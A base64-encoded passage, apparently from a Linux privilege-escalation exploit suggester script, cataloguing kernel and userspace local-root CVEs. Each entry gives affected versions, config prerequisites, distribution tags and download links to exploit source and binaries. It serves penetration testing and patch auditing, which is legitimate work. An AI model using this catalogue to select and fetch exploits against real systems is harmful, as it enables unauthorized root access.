VNMUi4KYXV0aG9yOiB3Ym93bGluZyAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xODk1NV0ke3R4dHJzdH0gc3VidWlkX3NoZWxsClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjE1LHZlcjw9NC4xOS4yLENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xLGNtZDpbIC11IC91c3IvYmluL25ld3VpZG1hcCBdLGNtZDpbIC11IC91c3IvYmluL25ld2dpZG1hcCBdClRhZ3M6IHVidW50dT0xOC4wNHtrZXJuZWw6NC4xNS4wLTIwLWdlbmVyaWN9LGZlZG9yYT0yOHtrZXJuZWw6NC4xNi4zLTMwMS5mYzI4fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTE3MTIKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0ZGItYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80NTg4Ni56aXAKZXhwbG9pdC1kYjogNDU4ODYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IENPTkZJR19VU0VSX05TIG5lZWRzIHRvIGJlIGVuYWJsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xMzI3Ml0ke3R4dHJzdH0gUFRSQUNFX1RSQUNFTUUKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQsdmVyPDUuMS4xNyxzeXNjdGw6a2VybmVsLnlhbWEucHRyYWNlX3Njb3BlPT0wLHg4Nl82NApUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuMTUuMC0qfSx1YnVudHU9MTguMDR7a2VybmVsOjQuMTUuMC0qfSxkZWJpYW49OXtrZXJuZWw6NC45LjAtKn0sZGViaWFuPTEwe2tlcm5lbDo0LjE5LjAtKn0sZmVkb3JhPTMwe2tlcm5lbDo1LjAuOS0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTE5MDMKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0ZGItYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80NzEzMy56aXAKZXh0LXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9rZXJuZWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE5LTEzMjcyL3BvYy5jCkNvbW1lbnRzOiBSZXF1aXJlcyBhbiBhY3RpdmUgUG9sS2l0IGFnZW50LgpleHBsb2l0LWRiOiA0NzEzMwpleHBsb2l0LWRiOiA0NzE2MwphdXRob3I6IEphbm4gSG9ybiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xNTY2Nl0ke3R4dHJzdH0gWEZSTV9VQUYKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMsdmVyPDUuMC4xOSxDT05GSUdfVVNFUl9OUz15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT09MSxDT05GSUdfWEZSTT15ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2R1YXN5bnQuY29tL2Jsb2cvdWJ1bnR1LWNlbnRvcy1yZWRoYXQtcHJpdmVzYwpiaW4tdXJsOiBodHRwczovL2dpdGh1Yi5jb20vZHVhc3ludC94ZnJtX3BvYy9yYXcvbWFzdGVyL2x1Y2t5MApDb21tZW50czogQ09ORklHX1VTRVJfTlMgbmVlZHMgdG8gYmUgZW5hYmxlZDsgQ09ORklHX1hGUk0gbmVlZHMgdG8gYmUgZW5hYmxlZAphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMjEtMjczNjVdJHt0eHRyc3R9IGxpbnV4LWlzY3NpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPD01LjExLjMsQ09ORklHX1NMQUJfRlJFRUxJU1RfSEFSREVORUQhPXkKVGFnczogUkhFTD04ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cuZ3JpbW0tY28uY29tLzIwMjEvMDMvbmV3LW9sZC1idWdzLWluLWxpbnV4LWtlcm5lbC5odG1sCnNyYy11cmw6IGh0dHBzOi8vY29kZWxvYWQuZ2l0aHViLmNvbS9ncmltbS1jby9Ob3RRdWl0ZTBEYXlGcmlkYXkvemlwL3RydW5rCkNvbW1lbnRzOiBDT05GSUdfU0xBQl9GUkVFTElTVF9IQVJERU5FRCBtdXN0IG5vdCBiZSBlbmFibGVkCmF1dGhvcjogR1JJTU0KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMS0zNDkwXSR7dHh0cnN0fSBlQlBGIEFMVTMyIGJvdW5kcyB0cmFja2luZyBmb3IgYml0d2lzZSBvcHMKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTUuNyx2ZXI8NS4xMixDT05GSUdfQlBGX1NZU0NBTEw9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQhPTEKVGFnczogdWJ1bnR1PTIwLjA0e2tlcm5lbDo1LjguMC0oMjV8MjZ8Mjd8Mjh8Mjl8MzB8MzF8MzJ8MzN8MzR8MzV8MzZ8Mzd8Mzh8Mzl8NDB8NDF8NDJ8NDN8NDR8NDV8NDZ8NDd8NDh8NDl8NTB8NTF8NTIpLSp9LHVidW50dT0yMS4wNHtrZXJuZWw6NS4xMS4wLTE2LSp9ClJhbms6IDUKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5ncmFwbHNlY3VyaXR5LmNvbS9wb3N0L2tlcm5lbC1wd25pbmctd2l0aC1lYnBmLWEtbG92ZS1zdG9yeQpzcmMtdXJsOiBodHRwczovL2NvZGVsb2FkLmdpdGh1Yi5jb20vY2hvbXBpZTEzMzcvTGludXhfTFBFX2VCUEZfQ1ZFLTIwMjEtMzQ5MC96aXAvbWFpbgpDb21tZW50czogQ09ORklHX0JQRl9TWVNDQUxMIG5lZWRzIHRvIGJlIHNldCAmJiBrZXJuZWwudW5wcml2aWxlZ2VkX2JwZl9kaXNhYmxlZCAhPSAxCmF1dGhvcjogY2hvbXBpZTEzMzcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMS0yMjU1NV0ke3R4dHJzdH0gTmV0ZmlsdGVyIGhlYXAgb3V0LW9mLWJvdW5kcyB3cml0ZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE5LHZlcjw9NS4xMi1yYzYKVGFnczogdWJ1bnR1PTIwLjA0e2tlcm5lbDo1LjguMC0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9nb29nbGUuZ2l0aHViLmlvL3NlY3VyaXR5LXJlc2VhcmNoL3BvY3MvbGludXgvY3ZlLTIwMjEtMjI1NTUvd3JpdGV1cC5odG1sCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9nb29nbGUvc2VjdXJpdHktcmVzZWFyY2gvbWFzdGVyL3BvY3MvbGludXgvY3ZlLTIwMjEtMjI1NTUvZXhwbG9pdC5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAyMS0yMjU1NS9leHBsb2l0LmMKQ29tbWVudHM6IGlwX3RhYmxlcyBrZXJuZWwgbW9kdWxlIG11c3QgYmUgbG9hZGVkCmV4cGxvaXQtZGI6IDUwMTM1CmF1dGhvcjogdGhlZmxvdyAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCiMjIyMjIyMjIyMjIyBVU0VSU1BBQ0UgRVhQTE9JVFMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCm49MAoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0wMTg2XSR7dHh0cnN0fSBzYW1iYQpSZXFzOiBwa2c9c2FtYmEsdmVyPD0yLjIuOApUYWdzOiAKUmFuazogMQpleHBsb2l0LWRiOiAyMzY3NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0xMTg1XSR7dHh0cnN0fSB1ZGV2ClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEsY21kOltbIC1mIC9ldGMvdWRldi9ydWxlcy5kLzk1LXVkZXYtbGF0ZS5ydWxlcyB8fCAtZiAvbGliL3VkZXYvcnVsZXMuZC85NS11ZGV2LWxhdGUucnVsZXMgXV0KVGFnczogdWJ1bnR1PTguMTB8OS4wNApSYW5rOiAxCmV4cGxvaXQtZGI6IDg1NzIKQ29tbWVudHM6IFZlcnNpb248MS40LjEgdnVsbmVyYWJsZSBidXQgZGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZCAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMTE4NV0ke3R4dHJzdH0gdWRldiAyClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA4NDc4CkNvbW1lbnRzOiBTU0ggYWNjZXNzIHRvIG5vbiBwcml2aWxlZ2VkIHVzZXIgaXMgbmVlZGVkLiBWZXJzaW9uPDEuNC4xIHZ1bG5lcmFibGUgYnV0IGRpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMDgzMl0ke3R4dHJzdH0gUEFNIE1PVEQKUmVxczogcGtnPWxpYnBhbS1tb2R1bGVzLHZlcjw9MS4xLjEKVGFnczogdWJ1bnR1PTkuMTB8MTAuMDQKUmFuazogMQpleHBsb2l0LWRiOiAxNDMzOQpDb21tZW50czogU1NIIGFjY2VzcyB0byBub24gcHJpdmlsZWdlZCB1c2VyIGlzIG5lZWRlZApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC00MTcwXSR7dHh0cnN0fSBTeXN0ZW1UYXAKUmVxczogcGtnPXN5c3RlbXRhcCx2ZXI8PTEuMwpUYWdzOiBSSEVMPTV7c3lzdGVtdGFwOjEuMS0zLmVsNX0sZmVkb3JhPTEze3N5c3RlbXRhcDoxLjItMS5mYzEzfQpSYW5rOiAxCmF1dGhvcjogVGF2aXMgT3JtYW5keQpleHBsb2l0LWRiOiAxNTYyMApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMS0xNDg1XSR7dHh0cnN0fSBwa2V4ZWMKUmVxczogcGtnPXBvbGtpdCx2ZXI9MC45NgpUYWdzOiBSSEVMPTYsdWJ1bnR1PTEwLjA0fDEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTc5NDIKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTEtMjkyMV0ke3R4dHJzdH0ga3RzdXNzClJlcXM6IHBrZz1rdHN1c3MsdmVyPD0xLjQKVGFnczogc3Bhcmt5PTV8NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDExLzA4LzEzLzIKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTEtMjkyMS9rdHN1c3MtbHBlLnNoCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEyLTA4MDldJHt0eHRyc3R9IGRlYXRoX3N0YXIgKHN1ZG8pClJlcXM6IHBrZz1zdWRvLHZlcj49MS44LjAsdmVyPD0xLjguMwpUYWdzOiBmZWRvcmE9MTYgClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vc2VjbGlzdHMub3JnL2Z1bGxkaXNjbG9zdXJlLzIwMTIvSmFuL2F0dC01OTAvYWR2aXNvcnlfc3Vkby50eHQKZXhwbG9pdC1kYjogMTg0MzYKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDQ3Nl0ke3R4dHJzdH0gY2hrcm9vdGtpdApSZXFzOiBwa2c9Y2hrcm9vdGtpdCx2ZXI8MC41MApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9zZWNsaXN0cy5vcmcvb3NzLXNlYy8yMDE0L3EyLzQzMApleHBsb2l0LWRiOiAzMzg5OQpDb21tZW50czogUm9vdGluZyBkZXBlbmRzIG9uIHRoZSBjcm9udGFiICh1cCB0byBvbmUgZGF5IG9mIGRlbGF5KQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC01MTE5XSR7dHh0cnN0fSBfX2djb252X3RyYW5zbGl0X2ZpbmQKUmVxczogcGtnPWdsaWJjfGxpYmM2LHg4NgpUYWdzOiBkZWJpYW49NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2dvb2dsZXByb2plY3R6ZXJvLmJsb2dzcG90LmNvbS8yMDE0LzA4L3RoZS1wb2lzb25lZC1udWwtYnl0ZS0yMDE0LWVkaXRpb24uaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy8zNDQyMS50YXIuZ3oKZXhwbG9pdC1kYjogMzQ0MjEKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMTg2Ml0ke3R4dHJzdH0gbmV3cGlkIChhYnJ0KQpSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MjAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMzE1XSR7dHh0cnN0fSByYWNlYWJydApSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MTl7YWJydDoyLjEuNS0xLmZjMTl9LGZlZG9yYT0yMHthYnJ0OjIuMi4yLTIuZmMyMH0sZmVkb3JhPTIxe2FicnQ6Mi4zLjAtMy5mYzIxfSxSSEVMPTd7YWJydDoyLjEuMTEtMTIuZWw3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvMTMwCnNyYy11cmw6IGh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20vdGF2aXNvL2ZlMzU5MDA2ODM2ZDZjZDEwOTFlL3Jhdy8zMmZlODQ4MWM0MzRmOGNhZDViY2Y4NTI5Nzg5MjMxNjI3ZTUwNzRjL3JhY2VhYnJ0LmMKZXhwbG9pdC1kYjogMzY3NDcKYXV0aG9yOiBUYXZpcyBPcm1hbmR5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTEzMThdJHt0eHRyc3R9IG5ld3BpZCAoYXBwb3J0KQpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xMzE4XSR7dHh0cnN0fSBuZXdwaWQgKGFwcG9ydCkgMgpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQuMgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL29wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8wNC8xNC80CmV4cGxvaXQtZGI6IDM2NzgyCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTMyMDJdJHt0eHRyc3R9IGZ1c2UgKGZ1c2VybW91bnQpClJlcXM6IHBrZz1mdXNlLHZlcjwyLjkuMwpUYWdzOiBkZWJpYW49Ny4wfDguMCx1YnVudHU9KgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvNTIwCmV4cGxvaXQtZGI6IDM3MDg5CkNvbW1lbnRzOiBOZWVkcyBjcm9uIG9yIHN5c3RlbSBhZG1pbiBpbnRlcmFjdGlvbgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xODE1XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdApSZXFzOiBwa2c9c2V0cm91Ymxlc2hvb3QsdmVyPDMuMi4yMgpUYWdzOiBmZWRvcmE9MjEKUmFuazogMQpleHBsb2l0LWRiOiAzNjU2NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMjQ2XSR7dHh0cnN0fSB1c2VyaGVscGVyClJlcXM6IHBrZz1saWJ1c2VyLHZlcjw9MC42MApUYWdzOiBSSEVMPTZ7bGlidXNlcjowLjU2LjEzLSg0fDUpLmVsNn0sUkhFTD02e2xpYnVzZXI6MC42MC01LmVsN30sZmVkb3JhPTEzfDE5fDIwfDIxfDIyClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTUvMDcvMjMvY3ZlLTIwMTUtMzI0NS1jdmUtMjAxNS0zMjQ2L2N2ZS0yMDE1LTMyNDUtY3ZlLTIwMTUtMzI0Ni50eHQgCmV4cGxvaXQtZGI6IDM3NzA2CkNvbW1lbnRzOiBSSEVMIDUgaXMgYWxzbyB2dWxuZXJhYmxlLCBidXQgaW5zdGFsbGVkIHZlcnNpb24gb2YgZ2xpYmMgKDIuNSkgbGFja3MgZnVuY3Rpb25zIG5lZWRlZCBieSByb290aGVscGVyLmMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtNTI4N10ke3R4dHJzdH0gYWJydC9zb3NyZXBvcnQtcmhlbDcKUmVxczogcGtnPWFicnQsY21kOmdyZXAgLXFpIGFicnQgL3Byb2Mvc3lzL2tlcm5lbC9jb3JlX3BhdHRlcm4KVGFnczogUkhFTD03e2FicnQ6Mi4xLjExLTEyLmVsN30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xCnNyYy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xLzEKZXhwbG9pdC1kYjogMzg4MzIKYXV0aG9yOiByZWJlbApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS02NTY1XSR7dHh0cnN0fSBub3RfYW5fc3NobnVrZQpSZXFzOiBwa2c9b3BlbnNzaC1zZXJ2ZXIsdmVyPj02LjgsdmVyPD02LjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI2LzIKZXhwbG9pdC1kYjogNDExNzMKYXV0aG9yOiBGZWRlcmljbyBCZW50bwpDb21tZW50czogTmVlZHMgYWRtaW4gaW50ZXJhY3Rpb24gKHJvb3QgdXNlciBuZWVkcyB0byBsb2dpbiB2aWEgc3NoIHRvIHRyaWdnZXIgZXhwbG9pdGF0aW9uKQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS04NjEyXSR7dHh0cnN0fSBibHVlbWFuIHNldF9kaGNwX2hhbmRsZXIgZC1idXMgcHJpdmVzYwpSZXFzOiBwa2c9Ymx1ZW1hbix2ZXI8Mi4wLjMKVGFnczogZGViaWFuPTh7Ymx1ZW1hbjoxLjIzfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly90d2l0dGVyLmNvbS90aGVncnVncS9zdGF0dXMvNjc3ODA5NTI3ODgyODEzNDQwCmV4cGxvaXQtZGI6IDQ2MTg2CmF1dGhvcjogU2ViYXN0aWFuIEtyYWhtZXIKQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTEyNDBdJHt0eHRyc3R9IHRvbWNhdC1yb290cHJpdmVzYy1kZWIuc2gKUmVxczogcGtnPXRvbWNhdApUYWdzOiBkZWJpYW49OCx1YnVudHU9MTYuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL1RvbWNhdC1EZWJQa2dzLVJvb3QtUHJpdmlsZWdlLUVzY2FsYXRpb24tRXhwbG9pdC1DVkUtMjAxNi0xMjQwLmh0bWwKc3JjLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvdG9tY2F0LXJvb3Rwcml2ZXNjLWRlYi5zaApleHBsb2l0LWRiOiA0MDQ1MAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBBZmZlY3RzIG9ubHkgRGViaWFuLWJhc2VkIGRpc3Ryb3MKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtMTI0N10ke3R4dHJzdH0gbmdpbnhlZC1yb290LnNoClJlcXM6IHBrZz1uZ2lueHxuZ2lueC1mdWxsLHZlcjwxLjEwLjMKVGFnczogZGViaWFuPTgsdWJ1bnR1PTE0LjA0fDE2LjA0fDE2LjEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9OZ2lueC1FeHBsb2l0LURlYi1Sb290LVByaXZFc2MtQ1ZFLTIwMTYtMTI0Ny5odG1sCnNyYy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi0xMjQ3L25naW54ZWQtcm9vdC5zaApleHBsb2l0LWRiOiA0MDc2OAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBSb290aW5nIGRlcGVuZHMgb24gY3Jvbi5kYWlseSAodXAgdG8gMjRoIG9mIGRlbGF5KS4gQWZmZWN0ZWQ6IGRlYjg6IDwxLjYuMjsgMTQuMDQ6IDwxLjQuNjsgMTYuMDQ6IDEuMTAuMDsgZ2VudG9vOiA8MS4xMC4yLXIzCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTE1MzFdJHt0eHRyc3R9IHBlcmxfc3RhcnR1cCAoZXhpbSkKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTU0OQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0xNTMxXSR7dHh0cnN0fSBwZXJsX3N0YXJ0dXAgKGV4aW0pIDIKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTUzNQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi00OTg5XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdCAyClJlcXM6IHBrZz1zZXRyb3VibGVzaG9vdApUYWdzOiBSSEVMPTZ8NwpSYW5rOiAxCmFuY